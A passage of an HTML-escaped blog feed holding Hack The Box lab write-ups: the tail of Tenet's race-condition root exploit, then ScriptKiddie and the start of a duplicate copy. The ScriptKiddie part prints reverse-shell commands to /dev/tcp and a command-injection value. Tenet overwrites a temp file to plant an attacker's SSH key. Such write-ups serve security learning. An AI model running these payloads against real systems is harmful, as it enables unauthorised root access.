&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;checkFile&lt;span style=&#34;color:#f92672&#34;&gt;()&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; ! -s $1 &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;||&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; ! -f $1 &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                /bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Error in creating key file!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; -f $1 &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt; /bin/rm $1; &lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                exit &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;addKey&lt;span style=&#34;color:#f92672&#34;&gt;()&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        tmpName&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;$(&lt;/span&gt;mktemp -u /tmp/ssh-XXXXXXXX&lt;span style=&#34;color:#66d9ef&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;umask 110; touch $tmpName&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        /bin/echo $key &amp;gt;&amp;gt;$tmpName
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        checkFile $tmpName
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        /bin/cat $tmpName &amp;gt;&amp;gt;/root/.ssh/authorized_keys
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        /bin/rm $tmpName
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;key&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;addKey
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;checkAdded
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The script is fairly simple in nature. First, it creates a temp file in &lt;code&gt;/tmp&lt;/code&gt; and then it echos the root public root SSH key. Then it adds that file to the &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt; file and checks to make sure the key was added successfully.&lt;/p&gt;
&lt;p&gt;This creates a race conidion. If that file is overwritten by a diffrent SSH key before it is added to &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt;, it would grant SSH access as the root user.&lt;/p&gt;
&lt;p&gt;A simple bash can be used to check to check if the temp file has been created. If it has, it will be overwritten with a key key of our choosing. Place all this in a while loop and start it running.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;while&lt;/span&gt; true; &lt;span style=&#34;color:#66d9ef&#34;&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Checking for temp file...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;$(&lt;/span&gt; ls /tmp/ssh-* 2&amp;gt;/dev/null &lt;span style=&#34;color:#66d9ef&#34;&gt;)&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC6+U/U+EtFlAU/0QuXeMehQgipru8HqD+TOoGMoM8pON+Brgvr0ThHzSq14wSC6F8yZsHbHYgb7gVutcNsADD+mkl+aZn97385WgWxwYZdW6a8VRLCRFr9nLZhwGeBEJC33+GbKyn3P5flagzgdTlhSBeNxuIh1ahxhnunpEQO7x+J8vyP1ZzYbU2ukApurzkMbV3osD7ovKIKxHc9zbPLOT/907tpz0bT4K3PLsh2FTNjK7xhTNWbqO975+x0d/Ni3UIcmyEb6APTz2ipxqWELpw041Fj6uxzq9pRWLuMypV9vCP9smybu22yEClb4t4J3r63qFl+hpzEwcO8JS7gdhUI9oB7VxyrcjLM4/5MPCnW0faulAUnpspWMsaqun2OjJ1tQMtVJKT3WkUT/We6CPx6YigxnQgV6nUHW3qZ3ZCgvHRot8IRpCYA/fImMcWhuseX5dWGHOJtL641h43xI8AZPQylNkPepCzEa5vQ/b+tKaG7cWxjVD4jbgg4ZRk= root@ubuntu&amp;#34;&lt;/span&gt; &amp;gt; /tmp/ssh-*
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;File found and overwritten&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                exit
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;File not found. Continuing.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;EnableSSH.sh&lt;/code&gt; can then be run from another session. The Overwrite script reports it found and overwrote a file and &lt;code&gt;EnableSSH.sh&lt;/code&gt; tells us the key was added successfully.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-fileoverwritten.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;The private key matching the public key used in the script can then be used to SSH to Tenet with root permissions.&lt;/p&gt;
&lt;h2 id=&#34;wrap-up&#34;&gt;Wrap Up&lt;/h2&gt;
&lt;p&gt;Thanks &lt;a href=&#34;https://app.hackthebox.eu/users/94858&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;egotisticalSW&lt;/a&gt;
 for making this machine! I overall had a ton of fun. There was some difficulty on the root privesc. It took two days of attempting to finally get it working and switching to VIP+ servers. I think the challenge was I kept running into other people working on it at the same time and our scripts were clashing. I could see that getting very frustrating.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>HTB ScriptKiddie</title>
      <link>http://0xnightwolf.github.io/htb-writeups/scriptkiddie-writeup/</link>
      <pubDate>Wed, 16 Jun 2021 00:00:00 -0600</pubDate>
      
      <guid>http://0xnightwolf.github.io/htb-writeups/scriptkiddie-writeup/</guid>
      <description>&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-logo.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;In ScriptKiddie, we compromise a server run by a pair of script kiddies with an outdated version of msfvenom and chain several misconfigurations to achieve root access.&lt;/p&gt;
&lt;h2 id=&#34;enumeration&#34;&gt;Enumeration&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.91 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2021-02-07 15:33 UTC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.10.10.226
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.19s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;998&lt;/span&gt; closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT     STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Ubuntu Linux; protocol 2.0&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;3072&lt;/span&gt; 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;RSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ECDSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ED25519&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;5000/tcp open  http    Werkzeug httpd 0.16.1 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Python 3.8.5&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-title: k1d&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;5&lt;/span&gt; h4ck3r t00l5
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 30.26 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;NMAP  shows there is an SSH server which will be quiet useful late. For now since there are no know credentials or see an obvious vulnerability take a look at the web server on port 5000.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-h4ck3rt00l5.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;The site is a page single page of various &lt;em&gt;h4ck3r t00l5&lt;/em&gt;, NMAP, an msfvenom payload generator, and a search bar for Exploit DB. There doesn&amp;rsquo;t seem to be a whole lot more on the web server. Payloads can be generated and have an upload feature but outside of that and viewing the output from Exploit DB and NMAP there isn&amp;rsquo;t much on the site.&lt;/p&gt;
&lt;h2 id=&#34;foothold&#34;&gt;Foothold&lt;/h2&gt;
&lt;p&gt;It&amp;rsquo;s worth fuzzing by trying various special characters in the input fields for the nmap and exploit-db, and msfvenom input fields to see if there is a way to break it and achieve code execution. This doesn&amp;rsquo;t yield much and it seems there is some level of filtering in place.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-stophackingme.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;However, there is another place to provide user input. The msfvenom upload. . Playing around with the parameters shows that the windows payload expects an EXE, Android expects an APK, and  Linux would like an ELF. However it doens&amp;rsquo;t seem to work properly, returns that &amp;ldquo;Something went wrong&amp;rdquo;. Not super descriptive for trouble shooting.&lt;/p&gt;
&lt;p&gt;It turns out that  &lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2020-7384&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;CVE-2020-7384&lt;/a&gt;
 is a vulnerability in msfvenom that allows for code injection using APK template files.  We find a link on the nvd.nist.gove page that links to a &lt;a href=&#34;https://packetstormsecurity.com/files/161200/Metasploit-Framework-6.0.11-Command-Injection.html&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Metasploit module&lt;/a&gt;
.&lt;/p&gt;
&lt;p&gt;A module has also been included in msfconsole. Finding and configuring it is fairly trivial.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-msfvenomapkrcesetup.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;A payload is generated and then stored. Start a netcat listener, &lt;code&gt;nc -lnvp 4444&lt;/code&gt;, and  upload the malicious APK to the server.&lt;/p&gt;
&lt;p&gt;After a few minutes of loading, the listner gets a callback.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-callback.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;The call back is as the user &lt;code&gt;kid&lt;/code&gt; and they have a private SSH key in &lt;code&gt;/home/kid/.ssh/id_rsa&lt;/code&gt;That can be copied and pasted an attacker&amp;rsquo;s machine, permissions changed, &lt;code&gt;chmod 600 kid-id_rsa&lt;/code&gt; and then used to SSH right in and collect user.txt&lt;/p&gt;
&lt;h2 id=&#34;privilege-escalation&#34;&gt;Privilege Escalation&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;kid&lt;/code&gt; doesn&amp;rsquo;t seem to be in interesting groups nor do we have credentials to try and abuse. Checking through the code of the webapp to see if there is anything that can be used.&lt;/p&gt;
&lt;p&gt;IPs from requests that that are marked as containing special characters are entered into a &lt;code&gt;hackers&lt;/code&gt; file that also appears to be empty. Though &lt;code&gt;kid&lt;/code&gt; does have write permissions. Expanding the search beyond the &lt;code&gt;kid&lt;/code&gt;&amp;rsquo;s home directory and finds another user, &lt;code&gt;pwn&lt;/code&gt; We check out his directory and find a nicely named script called &lt;code&gt;scanlosers.sh&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-scanlosers.png&#34;
        alt=&#34;SCANLOSERS.PNG&#34;/&gt;&lt;/p&gt;
&lt;p&gt;It collects input from the &lt;code&gt;hackers&lt;/code&gt; file found earlier. One option would be to try to provide it with input that would launch a reverse shell. An attacker can stand up a netcat listener, &lt;code&gt;nc -lnvp 1234&lt;/code&gt;, and start trying to get a working payload.&lt;/p&gt;
&lt;p&gt;The following is a good starting point. &lt;code&gt;echo &amp;quot;bash -c &#39;bash -i&amp;gt;&amp;amp;/dev/tcp/10.10.14.20/1234 0&amp;gt;&amp;amp;1&#39;&amp;quot; &amp;gt; /home/kid/hackers&lt;/code&gt; and unfortunately, nothing comes back.  A space and a semi colon can be added to make sure we escape a current command. &lt;code&gt;echo &amp;quot;  ;bash -c &#39;bash -i&amp;gt;&amp;amp;/dev/tcp/10.10.14.20/1234 0&amp;gt;&amp;amp;1&#39;&amp;quot; &amp;gt; /home/kid/hackers&lt;/code&gt; The netcat listener get&amp;rsquo;s a connection!&lt;/p&gt;
&lt;p&gt;Which promptly dies. &amp;ldquo;ambicous redirect&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-ambiguousredirect.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s likely that whatever is after the reverse shell in  &lt;code&gt;scanlosers.sh&lt;/code&gt; script is doing odd things to it. A solution is to comment it out. &lt;code&gt;echo &amp;quot;  ;bash -c &#39;bash -i&amp;gt;&amp;amp;/dev/tcp/10.10.14.20/1234 0&amp;gt;&amp;amp;1&#39; # &amp;quot; &amp;gt; /home/kid/hackers&lt;/code&gt; Bingo. This time the call back is stable. &lt;code&gt;pwn&lt;/code&gt; is also kind enough to have a handy SSH key.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-pwnsshkey.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;root&#34;&gt;Root&lt;/h2&gt;
&lt;p&gt;Once again, &lt;code&gt;pwn&lt;/code&gt; doesn&amp;rsquo;t any interesting groups nor are there credentials to try &lt;em&gt;but&lt;/em&gt; &lt;code&gt;sudo -l&lt;/code&gt; reveals they can run a command with root privileges without authentication.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-pwnsudopermissions.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Msfconsolse can be started with root privileges. Not exactly the best sudo configuration. Launching the msfconsole we have full root privileges and nothing says we need to attack a remote target. Instead the commands can be executed directly on our current system.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-root.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;wrap-up&#34;&gt;Wrap Up&lt;/h2&gt;
&lt;p&gt;All in all, this was a pretty easy box and probably one of the shortest writeups I have written. That said, I really enjoyed it. In part it was nice to have a break from boxes where I had to think a lot harder and I also really enjoyed the theme of exploiting the infrastructure of a couple of Script Kiddies. Thank you very much &lt;a href=&#34;https://app.hackthebox.eu/users/4935&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;0xdf&lt;/a&gt;
 all the hard work you put into making this machine.&lt;/p&gt;
&lt;p&gt;Side note: Some of you maybe wondering how &lt;code&gt;scanlosers.sh&lt;/code&gt; was running. It seems like a cronjob but if you checked cron while enumerating, you won&amp;rsquo;t find it. It&amp;rsquo;s instead using something called &lt;code&gt;incron&lt;/code&gt;which instead of being time based, is based on file system events. It runs when it detects a write to &lt;code&gt;hackers&lt;/code&gt;, &lt;code&gt;scanlosers.sh&lt;/code&gt;. It&amp;rsquo;s a pretty neat trick that I should find a use for someday.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>HTB ScriptKiddie</title>
      <link>http://0xnightwolf.github.io/posts/scriptkiddie-writeup/</link>
      <pubDate>Wed, 16 Jun 2021 00:00:00 -0600</pubDate>
      
      <guid>http://0xnightwolf.github.io/posts/scriptkiddie-writeup/</guid>
      <description>&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/scriptkiddie-logo.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;In ScriptKiddie, we compromise a server run by a pair of script kiddies with an outdated version of msfvenom and chain several misconfigurations to achieve root access.&lt;/p&gt;
&lt;h2 id=&#34;enumeration&#34;&gt;Enumeration&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.91 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2021-02-07 15:33 UTC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.10.10.226
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.19s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;998&lt;/span&gt; closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT     STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Ubuntu Linux; protocol 2.0&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;3072&lt;/span&gt; 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;RSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ECDSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
